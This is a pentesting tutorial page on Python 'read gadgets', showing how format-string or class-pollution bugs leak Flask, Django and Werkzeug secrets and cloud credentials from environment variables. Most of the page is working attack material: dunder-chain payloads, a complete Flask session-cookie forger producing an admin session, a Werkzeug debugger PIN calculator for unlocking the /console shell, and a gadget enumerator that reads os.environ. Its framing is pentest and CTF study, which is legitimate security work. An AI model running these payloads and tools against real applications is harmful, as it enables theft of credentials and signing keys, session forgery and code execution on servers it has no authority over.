Python Internal Read Gadgets
Tip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Basic Information
Vulnerabilities such as Python Format Strings or Class Pollution may let you read Python internal data, but not execute code. A pentester therefore has to make the most of such a read primitive: use it to extract sensitive values (signing keys, credentials, debugger secrets) and turn the information leak into a real privilege escalation.
Flask - Read secret key
The main file of a Flask application usually holds the global app object where the secret key is configured:
app = Flask(__name__, template_folder='templates')
app.secret_key = '(:secret:)'
In this case it is enough to reach that object with any of the gadgets for accessing global objects listed in the Bypass Python sandboxes page.
If the vulnerability lives in a different Python file, you need a gadget that crosses from that file to the main module in order to reach the global object app.secret_key. Knowing this key lets you escalate privileges, because it is what Flask uses to sign session cookies.
A payload like this one from this writeup:
__init__.__globals__.__loader__.__init__.__globals__.sys.modules.__main__.app.secret_key
Use this payload to read app.secret_key (the name of the object in your target app may differ) so that you can sign new, more privileged Flask session cookies yourself.
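Once the key is leaked the escalation happens offline. The following is an added example (not code from the page, from Flask or from itsdangerous): it reproduces the format Flask's SecureCookieSessionInterface produces through itsdangerous.URLSafeTimedSerializer using only the standard library, so you can forge a session cookie and also check your own result the way the server would. The key "(:secret:)" and the session dict are assumed sample values; the salt "cookie-session", SHA-1 and HMAC key derivation are the defaults Flask passes to itsdangerous.

```python
import base64
import hashlib
import hmac
import json
import time
import zlib
from typing import Optional

# Values Flask's SecureCookieSessionInterface hands to itsdangerous.URLSafeTimedSerializer
SALT = b"cookie-session"   # salt used for key derivation
SEP = b"."                 # separator between payload, timestamp and signature


def b64url_encode(data: bytes) -> bytes:
    # itsdangerous base64: URL-safe alphabet, padding stripped
    return base64.urlsafe_b64encode(data).rstrip(b"=")


def b64url_decode(data: bytes) -> bytes:
    return base64.urlsafe_b64decode(data + b"=" * (-len(data) % 4))


def derive_key(secret_key: str) -> bytes:
    # key_derivation="hmac": the signing key is HMAC-SHA1(secret_key, salt)
    return hmac.new(secret_key.encode(), SALT, hashlib.sha1).digest()


def forge_flask_session(secret_key: str, session: dict, timestamp: Optional[int] = None) -> str:
    """Build a cookie that Flask accepts as a valid session holding `session`."""
    payload = json.dumps(session, separators=(",", ":"), sort_keys=True).encode()
    compressed = zlib.compress(payload)
    # URLSafeSerializerMixin compresses when that saves space and marks it with a leading "."
    body = b"." + b64url_encode(compressed) if len(compressed) < len(payload) - 1 else b64url_encode(payload)
    ts = int(time.time()) if timestamp is None else timestamp
    ts_b64 = b64url_encode(ts.to_bytes((ts.bit_length() + 7) // 8, "big"))
    signed_value = body + SEP + ts_b64
    sig = b64url_encode(hmac.new(derive_key(secret_key), signed_value, hashlib.sha1).digest())
    return (signed_value + SEP + sig).decode()


def verify_flask_session(secret_key: str, cookie: str, max_age: Optional[int] = None) -> Optional[dict]:
    """Mirror of the server-side check: returns the session dict, or None if the cookie is bad."""
    raw = cookie.encode()
    try:
        signed_value, sig = raw.rsplit(SEP, 1)
        body, ts_b64 = signed_value.rsplit(SEP, 1)
    except ValueError:
        return None
    expected = b64url_encode(hmac.new(derive_key(secret_key), signed_value, hashlib.sha1).digest())
    if not hmac.compare_digest(expected, sig):
        return None
    ts = int.from_bytes(b64url_decode(ts_b64), "big")
    if max_age is not None and time.time() - ts > max_age:
        return None
    payload = zlib.decompress(b64url_decode(body[1:])) if body.startswith(b".") else b64url_decode(body)
    return json.loads(payload)


if __name__ == "__main__":
    # constructed sample: the key leaked through a read gadget and the session we want to obtain
    leaked_key = "(:secret:)"
    cookie = forge_flask_session(leaked_key, {"user": "admin", "is_admin": True})
    print(cookie)
    print(verify_flask_session(leaked_key, cookie))
```

Send the forged value as the `session` cookie. If the application sets PERMANENT_SESSION_LIFETIME the timestamp segment is checked against it, which is why the forger takes an explicit timestamp and the verifier a max_age.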
Werkzeug - machine_id and node uuid
Using these payloads from this writeup you can read the machine_id and the uuid node, which are the private secrets needed to generate the Werkzeug PIN that unlocks the Python console at /console when debug mode is enabled:
{ua.__class__.__init__.__globals__[t].sys.modules[werkzeug.debug]._machine_id}
{ua.__class__.__init__.__globals__[t].sys.modules[werkzeug.debug].uuid._node}
Warning
Note that you can obtain the server's local path to app.py by triggering an error on the web page: the traceback will reveal the path, which is one of the public bits that go into the PIN.
If the vulnerability is in a different python file, check the previous Flask trick to access the objects from the main python file.
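With the two private bits leaked and the public bits taken from the error page, the PIN can be computed offline. This is an added example, not Werkzeug's own code: it re-implements the algorithm of werkzeug.debug.get_pin_and_cookie_name in plain stdlib so that the inputs are explicit. The username, module path and the node/machine-id values in the sample are assumed placeholders. Werkzeug 2.0 and later hash with SHA-1; older releases used MD5, so the digest is a parameter.

```python
import hashlib
from itertools import chain
from typing import Optional, Tuple


def werkzeug_pin(username: Optional[str], modname: str, app_name: str, app_file: Optional[str],
                 node: int, machine_id: bytes, digest=hashlib.sha1) -> Tuple[str, str]:
    """Return (pin, cookie_name) the way werkzeug.debug.get_pin_and_cookie_name builds them.

    username   : owner of the server process (getpass.getuser() on the target), None if unknown
    modname    : app.__module__                  -> 'flask.app' for a Flask application
    app_name   : getattr(app, '__name__', type(app).__name__) -> 'Flask' for a Flask application
    app_file   : sys.modules[modname].__file__, the path leaked by the error page
    node       : the int leaked as werkzeug.debug.uuid._node (uuid.getnode() on the target)
    machine_id : the bytes leaked as werkzeug.debug._machine_id
    digest     : hashlib.sha1 for Werkzeug >= 2.0, hashlib.md5 for older releases
    """
    probably_public_bits = [username, modname, app_name, app_file]
    # Werkzeug feeds str(uuid.getnode()), i.e. the decimal form of the node int
    private_bits = [str(node), machine_id]

    h = digest()
    for bit in chain(probably_public_bits, private_bits):
        if not bit:
            continue
        if isinstance(bit, str):
            bit = bit.encode()
        h.update(bit)
    h.update(b"cookiesalt")
    cookie_name = f"__wzd{h.hexdigest()[:20]}"

    # the PIN continues the same hash state with a second salt
    h.update(b"pinsalt")
    num = f"{int(h.hexdigest(), 16):09d}"[:9]
    for group_size in (5, 4, 3):
        if len(num) % group_size == 0:
            pin = "-".join(num[x:x + group_size].rjust(group_size, "0")
                           for x in range(0, len(num), group_size))
            break
    else:
        pin = num
    return pin, cookie_name


if __name__ == "__main__":
    # constructed sample values; on a real target every one of them comes from the leaks above
    pin, cookie_name = werkzeug_pin(
        username="www-data",
        modname="flask.app",
        app_name="Flask",
        app_file="/usr/lib/python3/dist-packages/flask/app.py",
        node=94558041547692,
        machine_id=b"2c3b5d3ebba84e4c9bd6f3ad9d9a9a2d",
    )
    print(pin, cookie_name)
```

machine_id must be passed exactly as leaked: on Linux Werkzeug concatenates /etc/machine-id (or /var/lib/dbus/machine-id), the first line of /proc/sys/kernel/random/boot_id and, inside containers, the last cgroup path component, so do not strip or re-encode it. The returned cookie_name is the name of the cookie the debugger sets once the PIN is accepted.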
Django - SECRET_KEY and settings module
Django's settings object is kept in sys.modules once the application has started. With nothing more than read primitives you can leak SECRET_KEY, database credentials or signing salts:
# When DJANGO_SETTINGS_MODULE is set (usual case)
sys.modules[os.environ['DJANGO_SETTINGS_MODULE']].SECRET_KEY
# Through the global settings proxy
a = sys.modules['django.conf'].settings
(a.SECRET_KEY, a.DATABASES, a.SIGNING_BACKEND)
If the vulnerable gadget lives in another module, walk the globals first:
__init__.__globals__['sys'].modules['django.conf'].settings.SECRET_KEY
Once the key is known you can forge Django signed cookies or tokens, in the same way as with the Flask key.
Environment variables / cloud creds via already-loaded modules
Most jails still import os or sys somewhere. You can abuse any reachable function's __init__.__globals__ to pivot to the already-imported os module and dump the environment variables holding API tokens, cloud keys or flags:
# Classic os._wrap_close gadget; the subclass index changes between versions, so match by name
cls = [c for c in object.__subclasses__() if 'os._wrap_close' in str(c)][0]
# _wrap_close is defined in os.py, so its __init__.__globals__ is the os module namespace itself:
# environ (and system/popen) are there directly, there is no 'os' key to go through
cls.__init__.__globals__['environ']['AWS_SECRET_ACCESS_KEY']
If subclass enumeration is filtered, pivot through the module loader instead:
__loader__.__init__.__globals__['sys'].modules['os'].environ['FLAG']
Environment variables are often the only secrets needed to go from a read primitive to full compromise (cloud IAM keys, database URLs, signing keys, etc.).
Django-Unicorn class pollution (CVE-2025-24370)
django-unicorn (<0.62.0) allowed class pollution through crafted component requests. Setting a property path such as __init__.__globals__ gave an attacker access to the component module's globals and to every module it imports (e.g. settings, os, sys). From there you can leak SECRET_KEY, DATABASES or service credentials without code execution. The exploit chain is purely read-based and relies on the same dunder-gadget patterns shown above.
Gadget collections for chaining
Recent CTFs (e.g. jailCTF 2025) show reliable read chains built from nothing but attribute access and subclass enumeration. Community-maintained lists such as pyjailbreaker catalogue hundreds of minimal gadgets you can chain to move from arbitrary objects to __globals__, to sys.modules and finally to sensitive data. Use them to adapt quickly when indices or class names differ between Python minor versions.
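Rather than hard-coding a subclass index or a class name, the two entry points used throughout this page (object.__subclasses__() and the module __loader__) can be searched for whatever name you need. The following is an added example, not code from the page or from pyjailbreaker: it enumerates every function globals dict reachable from those entry points, reports which chains expose a given name, and uses that to reach an already-imported module without an import statement, with a fallback through any reachable sys.modules. It serves both the environment-variable section above and this one; the variable names and the environment variable looked up at the bottom are assumed for the demonstration.

```python
from typing import Iterator, List, Optional, Tuple


def reachable_globals() -> Iterator[Tuple[str, dict]]:
    """Yield (attribute chain, globals dict) for every __init__.__globals__ reachable
    from object.__subclasses__() and from this module's __loader__, the two roots the
    payloads on this page start from. Builtin classes have no __globals__ and are skipped."""
    for cls in object.__subclasses__():
        init = getattr(cls, "__init__", None)
        g = getattr(init, "__globals__", None)
        if isinstance(g, dict):
            yield f"{cls.__module__}.{cls.__qualname__}.__init__.__globals__", g
    loader = globals().get("__loader__")
    g = getattr(getattr(loader, "__init__", None), "__globals__", None)
    if isinstance(g, dict):
        yield "__loader__.__init__.__globals__", g


def find_gadgets(name: str) -> List[str]:
    """Return every reachable chain whose globals directly contain `name`
    (for example 'os', 'sys' or 'environ'). Use this instead of a fixed subclass index."""
    return [path for path, g in reachable_globals() if name in g]


def pivot_to_module(modname: str):
    """Reach a module that is already imported in the process without using `import`.
    First looks for the module object itself in some globals, then falls back to any
    reachable `sys` and reads sys.modules[modname] from it."""
    for _, g in reachable_globals():
        mod = g.get(modname)
        if getattr(mod, "__name__", None) == modname:
            return mod
    for _, g in reachable_globals():
        s = g.get("sys")
        if s is not None and hasattr(s, "modules") and modname in s.modules:
            return s.modules[modname]
    return None


def read_env(var: str) -> Optional[str]:
    """Read an environment variable through whichever gadget reaches `os`."""
    os_mod = pivot_to_module("os")
    return None if os_mod is None else os_mod.environ.get(var)


if __name__ == "__main__":
    # assumed for the demo: which chains expose os.environ and what PATH looks like
    for chain_ in find_gadgets("environ")[:5]:
        print(chain_)
    print(read_env("PATH"))
```

When a jail filters subclass enumeration, the loader branch is still tried; when it filters attribute names such as __globals__, these helpers no longer apply and a different gadget from the collections above is needed.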
References
- Wiz analysis of django-unicorn class pollution (CVE-2025-24370)
- pyjailbreaker – Python sandbox gadget wiki